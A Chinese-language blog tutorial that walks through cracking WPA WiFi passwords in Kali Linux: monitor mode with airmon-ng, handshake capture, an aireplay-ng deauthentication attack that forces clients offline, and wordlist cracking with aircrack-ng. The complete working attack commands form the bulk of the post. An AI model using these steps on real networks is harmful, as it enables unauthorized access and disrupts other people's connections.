Kali Linux破解WIFI密码

实验准备:

1、kalilinux实验机

2、一个具有监听功能的外置无线网卡

3、密码字典

开始实验:

注:仅用于实验测试,切勿用于恶意破解。

1、开启kali虚拟机,插上无线网卡,连接无线网卡到kali.

       点击“虚拟机”→“可移动设备”→选中你的无线网卡→“连接(断开与主机的连接)”,在弹出的对话框中点击“确定”

2、查看网卡信息

       使用 ifconfig 命令查看网卡信息。可以看到里面有个wlan0,那就是无线网卡,如果没有的话就把无线网卡拔了再插一下,直到出现wlan0为止。一定要保证它现在没有连接到任何wifi,wlan0里面没有ip地址什么的,就说明未连接任何WIFI。

3、检查网卡是否支持监听功能

       使用 airmon-ng 命令检查网卡是否支持监听功能。显示可以看到无线网卡wlan0,即代表支持监听模式的。(没有显示则代表支持无线网卡不支持监听)

4、开启网卡的监听模式。

  使用命令 airmon-ng start wlan0 激活无线网卡monitor监听模式。

使用 ifconfig ,发现无线网卡名字为wlan0mon,代表已经开启监听。

5、扫描WIFI信号

  使用 airodump-ng wlan0mon 扫描wifi信号,扫描完成后按Ctrl+C停止扫描。

参数解释:

      BSSID为wifi的MAC地址

     PWR为信号强弱程度,数值越小信号越强

     #DATA为数据量,越大使用的人就越多

     CH为信道频率(频道)

     ESSID为wifi的名称,中文可能会有乱码

     STATION是连接WiFi终端的MAC地址

6、探测无线网络,抓取无线数据包

要选择破解的wifi必须有终端连接才行,没有连接的终端是破解不了的。

使用airodump-ng -w kali/wifi/freedom -c 12 --bssid 44:19:B6:84:51:55   wlan0mon

参数解释:

    -c 设置目标AP的工作信道。

    -w 要保存的文件的文件名,注意:生成的文件名是freedom-01.cap,后面破解密码时需要用到。

    wlan0mon:为之前已经开启监听的网卡名。

    在右上角出现handshake的提示证明获得了包含WPA-PSK密码的4次握手数据报文。

如果抓取不到数据,新建一个终端,使用aireplay-ng -0 2 -a 44:19:B6:84:51:55   -c 14:AB:C5:B8:49:EE wlan0mon查看连接的终端,强制踢掉在线终端。

参数解释:

    -0:采用Deauth攻击模式,后面紧跟攻击次数,这里设置为2,大家可以根据实际情况设置,如果设置为0,则会导致对方一直掉线。

    -a:后面跟AP的mac地址。

    -c:后面跟客户端的mac地址。

出现WPA handshake时,表示抓包成功

或者是这样的截图

7、破解WIFI握手包

使用命令: aircrack-ng -w 密码字典的路径 捕获的.cap文件 ,按Enter开始执行。

开始进行密码破解,能否成功破解WIFI密码取决于密码字典本身是否包含了这个密码,破解的时间取决于CPU的运算速度以及密码本身的复杂程度。

  KEY FOUND!便是破解成功,密码就是[]里面的值。

aircrack-ng -w password.txt kali/wifi/freedom-14.cap

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

QYpiying

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值